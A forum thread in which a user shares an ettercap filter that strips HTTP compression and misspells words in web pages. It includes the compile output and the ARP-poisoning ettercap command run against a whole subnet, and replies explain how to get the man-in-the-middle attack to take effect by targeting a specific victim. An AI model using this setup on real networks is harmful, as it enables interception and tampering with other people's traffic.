Thread: ettercap filter problem

  1. #1
    imported_pynstrom (Member)

    I've read a couple of tutorials from the ettercap forums and from irongeek, and created a small filter to misspell two commonly used words:
    Code:
    # Outbound HTTP requests: rewrite the Accept-Encoding header name
    # (same length) so the server replies with uncompressed content.
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          msg("accepting rubbish\n");
       }
    }
    # HTTP responses: swap letters in "the".
    if (ip.proto == TCP && tcp.src == 80) {
       replace("the", "teh");
       replace("The", "Teh");
       replace("THE", "TEH");
       msg("the filter ran.\n");
    }
    # HTTP responses: swap letters in "and".
    if (ip.proto == TCP && tcp.src == 80) {
       replace("and", "adn");
       replace("And", "Adn");
       replace("AND", "ADN");
       msg("and filter ran.\n");
    }
    Note: I've also tried replacing "and" & "the" in the same function.

    The filter compiles just fine:

    Code:
    ~# etterfilter -o /root/filter.ef misspell.filter
    
    etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
     12 protocol tables loaded:
            DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
     11 constants loaded:
            VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
     Parsing source file 'misspell.filter'  done.
     Unfolding the meta-tree  done.
     Converting labels to real offsets  done.
     Writing output to 'filter.ef'  done.
     -> Script encoded into 25 instructions.

    Then I run ettercap in text mode:

    Code:
    ~# ettercap -Tq -i wlan0 -F filter.ef -M arp // //
    
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Content filters loaded from filter.ef...
    Listening on wlan0... (Ethernet)
    
     wlan0 ->       00:c0:ca:25:0a:f4       192.168.1.3     255.255.255.0
    
    Privileges dropped to UID 0 GID 0...
    
      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==================================================>| 100.00 %
    
    7 hosts added to the hosts list...
    
    ARP poisoning victims:
    
     GROUP 1 : ANY (all the hosts in the list)
    
     GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing...
    
    Text only Interface activated...
    Hit 'h' for inline help

    When I surf the internet on a separate box connected to the same network, the filter msg runs as if the filter worked, but the text on the target machine is unaffected. I compared it to the filter used in irongeek's tutorial and I don't see any difference. Could someone give me a shove in the right direction? Thank you for your time.
    When hungry, eat your rice; when tired, close your eyes. Fools may laugh at me, but wise men will know what I mean. -- Lin-Chi
    - - - - - - - -
    I slept once, it was a Tuesday.

  2. #2
    Good friend of the forums

    I had the same problem. To fix it, when it says help, press -h then -p and type chk_poison (and check: the computer to poison shouldn't show up; if it does), then type repoison_arp, then check that it's not listed with chk_poison.

    Hope it helps.

  3. #3
    Senior Member

    Well, first of all, your code does seem to be correct, and as it compiles without errors there should be no problem with it. Have you tried to specify the victim instead of running the script for all clients on the subnet?

    I have noticed this same problem with the script apparently running but no change seen on the victim PC when you do not specify the victim.
    -Monkeys are like nature's humans.

  4. #4
    imported_pynstrom (Member)

    Quote, originally posted by =Tron=:
        Have you tried to specify the victim instead of running the script for all clients on the subnet?

        I have noticed this same problem with the script apparently running but no change seen on the victim PC when you do not specify the victim.

    The obvious has never been my strong suit. I always seem to spend too much time looking for a complicated answer. Thanks for your help Tron.